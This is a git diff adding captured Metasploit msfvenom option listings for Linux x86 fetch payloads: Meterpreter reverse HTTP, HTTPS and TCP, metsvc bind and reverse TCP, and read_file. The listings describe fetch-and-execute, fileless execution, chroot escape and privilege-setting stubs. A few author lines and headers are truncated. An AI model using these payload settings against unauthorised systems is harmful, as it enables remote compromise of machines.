yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of 
a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + 
VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_http.txt new file mode 100644 index 0000000..614657c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x86/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/x86/meterpreter_reverse_http: +========================= + +ent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TAuAEjPwQHq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_https.txt new file mode 100644 index 0000000..e9a0fa0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x86/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/x86/meterpreter_reverse_https: +========================= + +t_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME IrrBVfVSqoAJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..5b55dd1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/x86/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME owvsLrgs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-metsvc_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-metsvc_bind_tcp.txt new file mode 100644 index 0000000..55dd2db --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-x86-metsvc_bind_tcp.txt 
@@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Linux Meterpreter Service, Bind TCP + Module: payload/cmd/linux/http/x86/metsvc_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uGdmuNanIf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-metsvc_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-metsvc_reverse_tcp.txt new file mode 100644 index 0000000..169a00c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-metsvc_reverse_tcp.txt 
@@ -0,0 +1,98 @@ + + Name: HTTP Fetch, Linux Meterpreter Service, Reverse TCP Inline + Module: payload/cmd/linux/http/x86/metsvc_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME suLGFVvas no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) 
system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-read_file.txt b/msfvenom/payload_options/cmd-linux-http-x86-read_file.txt new file mode 100644 index 0000000..e06e6e1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-read_file.txt 
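Review bot: FETCH_FILENAME in the cmd-linux-http-x86-metsvc_reverse_tcp.txt hunk above is committed with a randomly generated default (suLGFVvas here, a different string in each sibling file in this patch), so every re-run of the capture will rewrite that line in all payload_options files and bury real option changes in noise. Suggest the capture script normalises the field to a fixed placeholder such as `FETCH_FILENAME <random> no Name to use on remote system when storing payload; cannot contain spaces or slashes`, or the README states that this default is random and is expected to churn.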
@@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Linux Read File + Module: payload/cmd/linux/http/x86/read_file + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FD 1 yes The file descriptor to write output to +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PATH yes The file path to read + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QnjCOOhyrQR no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the 
